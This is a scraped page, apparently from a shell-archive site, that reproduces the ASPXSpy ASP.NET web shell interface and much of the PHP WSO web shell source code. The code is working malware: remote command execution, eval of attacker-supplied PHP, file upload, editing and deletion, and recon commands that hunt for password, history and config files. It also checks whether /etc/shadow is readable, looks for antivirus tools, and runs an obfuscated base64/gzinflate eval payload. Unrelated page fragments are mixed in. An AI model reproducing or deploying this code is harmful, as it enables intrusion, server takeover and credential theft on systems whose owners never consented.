                                <%@ Page Language='C#' Debug='true' trace='false' validateRequest='false' EnableViewStateMac='false' EnableViewState='true'%> <%@ import Namespace='System.IO'%> <%@ import Namespace='System.Diagnostics'%> <%@ import Namespace='System.Data'%> <%@ import Namespace='System.Management'%> <%@ import Namespace='System.Data.OleDb'%> <%@ import Namespace='Microsoft.Win32'%> <%@ import Namespace='System.Net.Sockets' %> <%@ import Namespace='System.Net' %> <%@ import Namespace='System.Runtime.InteropServices'%> <%@ import Namespace='System.DirectoryServices'%> <%@ import Namespace='System.ServiceProcess'%> <%@ import Namespace='System.Text.RegularExpressions'%> <%@ Import Namespace='System.Threading'%> <%@ Import Namespace='System.Data.SqlClient'%> <%@ import Namespace='Microsoft.VisualBasic'%> <%@ Assembly Name='System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A'%> <%@ Assembly Name='Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a'%> ASPXspy
                                Password:

                                Copyright © 2009 Bin -- www.rootkit.net.cn

                                ASPXSpy Ver: 2009
                                | | | | | | | | | | | | |

                                <%--FileList--%>
                                Current Directory :
                                 FilenameLast modifiedSizeAction
                                | Create Directory | Create File | Kill Me
                                <%--FileEdit--%>

                                Current File(import new file name and new file)
                                DefaultUTF-8

                                File Content

                                <%--CloneTime--%>

                                Alter file

                                Reference file(fullpath)

                                Set last modified »

                                Current file(fullpath)

                                     

                                CreationTime : LastWriteTime : LastAccessTime :

                                <%--IISSpy--%>
                                IDIIS_USERIIS_PASSDomainPath
                                <%--Process--%>
                                IDProcessThreadCountPriorityAction
                                <%--CmdShell--%>

                                CmdPath:

                                Argument:
                                <%--Services--%>
                                IDNamePathStateStartMode
                                <%--Sysinfo--%>



                                      <%--UserInfo--%>
                                      <%--SuExp--%>
                                      UserName : PassWord : Port :
                                      CmdShell  : 
                                      <%--Reg--%>

                                      Registry Path :

                                      KeyValue
                                      <%--PortScan--%>

                                      IP : Port :

                                      <%--DataBase--%>

                                      ConnString : MSSQLACCESS

                                      Please select a database : SQLExec : -- SQL Server Exec --Add xp_cmdshellAdd sp_oacreateAdd xp_cmdshell(SQL2005)Add sp_oacreate(SQL2005)Add makewebtask(SQL2005)Add openrowset/opendatasource(SQL2005)XP_cmdshell execXP_dirtree>c:\bin.asp';'>SP_oamethod execSP_makewebtask make fileSandBoxLogBackupDatabaseBackup
                                      Run SQL

                                      <%--PortMap--%>
                                      Local Ip : Local Port : Remote Ip : Remote Port :

                                      <%--Search--%>
                                      Keyword Use Regex
                                      Replace As Replace
                                      Search FileType File NameFile Content
                                      Path


                                      File PathLast modifiedSize
                                      Copyright © 2006-2009 Shell Arsivi All Rights Reserved.
                                      Sports Capes (4349)
                                      Sports themes or objects in support of player unions.
                                      '; $drives = ''; if($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if(is_dir($drive.':\\')) $drives .= '[ '.$drive.' ] '; } echo '
                                      Password:
                                      '); } function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } if(!empty($auth_pass)) { if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin(); } if(strtolower(substr(PHP_OS,0,3)) == 'win') $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace('\\', '/', $home_cwd); $cwd = str_replace('\\', '/', $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax; if($os == 'win') $aliases = array( 'List Directory' => 'dir', 'Find index.php in current dir' => 'dir /s /w /b index.php', 'Find *config*.php in current dir' => 'dir /s /w /b *config*.php', 'Show active connections' => 'netstat -an', 'Show running services' => 'net start', 'User accounts' => 'net user', 'Show computers' => 'net view', 'ARP Table' => 'arp -a', 'IP Configuration' => 'ipconfig /all' ); else $aliases = array( 'List dir' => 'ls -lha', 'list file attributes on a Linux second extended file system' => 'lsattr -va', 'show opened ports' => 'netstat -an | grep -i listen', 'process status' => 'ps aux', 'Find' => '', 'find suid' => 'find / -type f -perm -04000 -ls', 'find suid in current dir' => 'find . -type f -perm -04000 -ls', 'find sgid' => 'find / -type f -perm -02000 -ls', 'find sgid files in current dir' => 'find . -type f -perm -02000 -ls', 'find config.inc.php' => 'find / -type f -name config.inc.php', 'find config*' => 'find / -type f -name \'config*\'', 'find config* in current dir' => 'find . -type f -name \'config*\'', 'find writable folders and files' => 'find / -perm -2 -ls', 'find writable folders and files in current dir' => 'find . -perm -2 -ls', 'find service.pwd' => 'find / -type f -name service.pwd', 'find service.pwd files in current dir' => 'find . -type f -name service.pwd', 'find .htpasswd' => 'find / -type f -name .htpasswd', 'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd', 'find .bash_history' => 'find / -type f -name .bash_history', 'find .bash_history files in current dir' => 'find . -type f -name .bash_history', 'find .fetchmailrc' => 'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc', 'Locate' => '', 'locate httpd.conf' => 'locate httpd.conf', 'locate vhosts.conf' => 'locate vhosts.conf', 'locate proftpd.conf' => 'locate proftpd.conf', 'locate psybnc.conf' => 'locate psybnc.conf', 'locate my.conf' => 'locate my.conf', 'locate admin.php' =>'locate admin.php', 'locate cfg.php' => 'locate cfg.php', 'locate conf.php' => 'locate conf.php', 'locate config.dat' => 'locate config.dat', 'locate config.php' => 'locate config.php', 'locate config.inc' => 'locate config.inc', 'locate config.inc.php' => 'locate config.inc.php', 'locate config.default.php' => 'locate config.default.php', 'locate config*' => 'locate config', 'locate .conf'=>'locate '.conf'', 'locate .pwd' => 'locate '.pwd'', 'locate .sql' => 'locate '.sql'', 'locate .htpasswd' => 'locate '.htpasswd'', 'locate .bash_history' => 'locate '.bash_history'', 'locate .mysql_history' => 'locate '.mysql_history'', 'locate .fetchmailrc' => 'locate '.fetchmailrc'', 'locate backup' => 'locate backup', 'locate dump' => 'locate dump', 'locate priv' => 'locate priv' ); function wsoHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; global $color; echo '' . $_SERVER['HTTP_HOST'] . ' - WSO ' . WSO_VERSION .'
                                      '; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://exploit-db.com/search/?action=search&filter_description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = '?'; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode('/', $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= '
                                      '.$path[$i].'/'; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= ''; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '
                                      [ '.$k.' ]
                                      ' . '' . '
                                      Uname:
                                      User:
                                      Php:
                                      Hdd:
                                      Cwd:' . ($GLOBALS['os'] == 'win'?'
                                      Drives:':'') . '
                                      ' . substr(@php_uname(), 0, 120) . ' [exploit-db.com]
                                      ' . $uid . ' ( ' . $user . ' ) Group: ' . $gid . ' ( ' . $group . ' )
                                      ' . @phpversion() . ' Safe mode: ' . ($GLOBALS['safe_mode']?'ON':'OFF') . ' [ phpinfo ] Datetime: ' . date('Y-m-d H:i:s') . '
                                      ' . wsoViewSize($totalSpace) . ' Free: ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)
                                      ' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' [ home ]
                                      ' . $drives . '

                                      Server IP:
                                      ' . @$_SERVER['SERVER_ADDR'] . '
                                      Client IP:
                                      ' . $_SERVER['REMOTE_ADDR'] . '
                                      ' . '' . $menu . '
                                      ';eval(gzinflate(base64_decode('dZJNc5swEIb/iieTQ3ITuInLZHrAuBIrx9SA+dLFAxbBssRHQxMX//qqJk4y0+lhR6PZffTuu6vrrn3+tS1Ew7d88m1yRV3W7UyFssG2wAmefGStQ6RwMlAzT72OuyuRbnrPqVUNTiV5rU55GhxggXQ9iGU4ny38ttLsWE9Wlc5Vq4VmhF1d3i+mUK1DW6aGhyPFdPQikrG3MQKcIvw9wDDqnBmuMn2CY//DhDiIImzBxvAiUOii3RV1e67/q02xtQlimugoQFEcxTGOjOApjin9xKAspQ1L/TOzq/GUp7RnJD4UZqCWTjBlCbxQol5yIS/MT54ERvGmA0r3qbyWJb97IHvEXfv+cfgqOcEDM2MEhN59zMUa4PDmj9BX5sqLP+E3cfND2P/l1oQOawFjD+S8hz1LjCN3ZTvOSnbg9pVPjH2eHFuosxNbzE+rKTV12DmxUJHgrnDutDckHt99HGVWW7IM5Qxc5DmNjjrud2ZUlYP9vuvl0I95OT8xfS9M6zlPohaacbelgP7jH8nZ1cOkfM3VTZH35f2XLS93LS9vrj/9vNvbhz8= '))); } function wsoFooter() { $is_writable = is_writable($GLOBALS['cwd'])?' (Writeable)':' (Not writable)'; echo '
                                      Change dir:
                                      Read file:
                                      Make dir:$is_writable
                                      Make file:$is_writable
                                      Execute:
                                      Upload file:$is_writable

                                      '; } if (!function_exists('posix_getpwuid') && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists('posix_getgrgid') && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join('\n',$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,'r'))) { $out = ''; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if (is_int($s)) $s = sprintf('%u', $s); if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return '' . wsoPerms(@fileperms($f)) . ''; elseif (!@is_writable($f)) return '' . wsoPerms(@fileperms($f)) . ''; else return '' . wsoPerms(@fileperms($f)) . ''; } function wsoScandir($dir) { if(function_exists('scandir')) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx('which ' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { wsoHeader(); echo '

                                      Server security information

                                      '; function wsoSecParam($n, $v) { $v = trim($v); if($v) { echo '' . $n . ': '; if(strpos($v, '\n') === false) echo $v . '
                                      '; else echo '
                                      ' . $v . '
                                      '; } } wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); wsoSecParam('Open base dir', @ini_get('open_basedir')); wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = 'MySql ('.mysql_get_client_info().')'; if(function_exists('mssql_connect')) $temp[] = 'MSSQL'; if(function_exists('pg_connect')) $temp[] = 'PostgreSQL'; if(function_exists('oci_connect')) $temp[] = 'Oracle'; wsoSecParam('Supported databases', implode(', ', $temp)); echo '
                                      '; if($GLOBALS['os'] == 'nix') { wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?'yes [view]':'no'); wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?'yes [view]':'no'); wsoSecParam('OS version', @file_get_contents('/proc/version')); wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '
                                      '; $temp=array(); foreach ($userful as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Downloaders', implode(', ',$temp)); echo '
                                      '; wsoSecParam('HDD space', wsoEx('df -h')); wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); echo '
                                      posix_getpwuid ('Read' /etc/passwd)
                                      From
                                      To
                                      '; if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { $temp = ''; for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) $temp .= join(':',$uid).'\n'; } echo '
                                      '; wsoSecParam('Users', $temp); } } } else { wsoSecParam('OS Version',wsoEx('ver')); wsoSecParam('Account Settings',wsoEx('net accounts')); wsoSecParam('User Accounts',wsoEx('net user')); } echo '
                                      '; wsoFooter(); } function actionPhp() { if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); ob_start(); eval($_POST['p1']); $temp = 'document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='' . addcslashes(htmlspecialchars(ob_get_clean()), '\n\r\t\\'\0') . '';\n'; echo strlen($temp), '\n', $temp; exit; } if(empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); wsoHeader(); if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { echo '

                                      PHP info

                                      '; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(array ( '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!]+>!msiU', ), array ( '', '.e, .v, .h, .h th {$1}', '' ), $tmp); echo str_replace('
                                      '; } echo '

                                      Execution PHP-code

                                      '; echo ' send using AJAX
                                      ';
                                          if(!empty($_POST['p1'])) {
                                              ob_start();
                                              eval($_POST['p1']);
                                              echo htmlspecialchars(ob_get_clean());
                                          }
                                          echo '
                                      '; wsoFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo 'Can't upload!'; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo 'Can't create!'; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == '..') || (basename($item) == '.') ) continue; $type = filetype($item); if ($type == 'dir') deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != '.') and ($f != '..')) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); } elseif($_COOKIE['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != '.') and ($f != '..')) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); } elseif($_COOKIE['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach($_COOKIE['f'] as $f) { if($f == '..') continue; if(@is_file($_COOKIE['c'].$f)) $zip->addFile($_COOKIE['c'].$f, $f); elseif(@is_dir($_COOKIE['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_COOKIE['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_COOKIE['f'] as $f) { if($zip->open($_COOKIE['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if(!empty($_POST['p1'])) { WSOsetcookie('act', $_POST['p1']); WSOsetcookie('f', serialize(@$_POST['f'])); WSOsetcookie('c', @$_POST['c']); } break; } } wsoHeader(); echo '

                                      File manager

                                      '; $dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo ' '; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, 'wsoCmp'); usort($dirs, 'wsoCmp'); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo ''; $l = $l?0:1; } echo '
                                      NameSizeModifyOwner/GroupPermissionsActions
                                      '.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');' ' . (empty ($f['link']) ? '' : 'title='{$f['link']}'') . '>[ ' . htmlspecialchars($f['name']) . ' ]').''.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] .'R T'.(($f['type']=='file')?' E D':'').'
                                       '; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo 'file name:  '; echo '
                                      '; wsoFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); $temp = 'document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML=''.addcslashes(htmlspecialchars(ob_get_clean()),'\n\r\t\\'\0').'';\n'; echo strlen($temp), '\n', $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo '

                                      String conversions

                                      '; echo '
                                      send using AJAX
                                      ';
                                          if(!empty($_POST['p1'])) {
                                              if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
                                          }
                                          echo'

                                      Search files:

                                      Text:
                                      Path:
                                      Name:
                                      '; function wsoRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $item) { if(@is_dir($item)){ if($path!=$item) wsoRecursiveGlob($item); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false) echo ''.htmlspecialchars($item).'
                                      '; } } } } if(@$_POST['p3']) wsoRecursiveGlob($_POST['c']); echo '

                                      Search for hash:





                                      '; wsoFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start('ob_gzhandler', 4096); header('Content-Disposition: attachment; filename='.basename($_POST['p1'])); if (function_exists('mime_content_type')) { $type = @mime_content_type($_POST['p1']); header('Content-Type: ' . $type); } else header('Content-Type: application/octet-stream'); $fp = @fopen($_POST['p1'], 'r'); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = 'edit'; fclose($fp); } } } wsoHeader(); echo '

                                      File tools

                                      '; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' Permission: '.wsoPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
                                      '; echo 'Change time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

                                      '; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' '; echo '

                                      '; switch($_POST['p2']) { case 'view': echo '
                                      ';
                                                  $fp = @fopen($_POST['p1'], 'r');
                                                  if($fp) {
                                                      while( !@feof($fp) )
                                                          echo htmlspecialchars(@fread($fp, 1024));
                                                      @fclose($fp);
                                                  }
                                                  echo '
                                      '; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '
                                      '; $code = @highlight_file($_POST['p1'],true); echo str_replace(array(''), array(''),$code).'
                                      '; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!
                                      '; } clearstatcache(); echo '
                                      '; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],'w'); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!
                                      '; @touch($_POST['p1'],$time,$time); } } echo '
                                      '; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000
                                      ','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
                                      ';} $h[1] .= '
                                      '; $h[2] .= '\n'; } } echo '
                                      '.$h[0].'
                                      '.$h[1].'
                                      '.htmlspecialchars($h[2]).'
                                      '; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!
                                      '; else die(''); } echo '
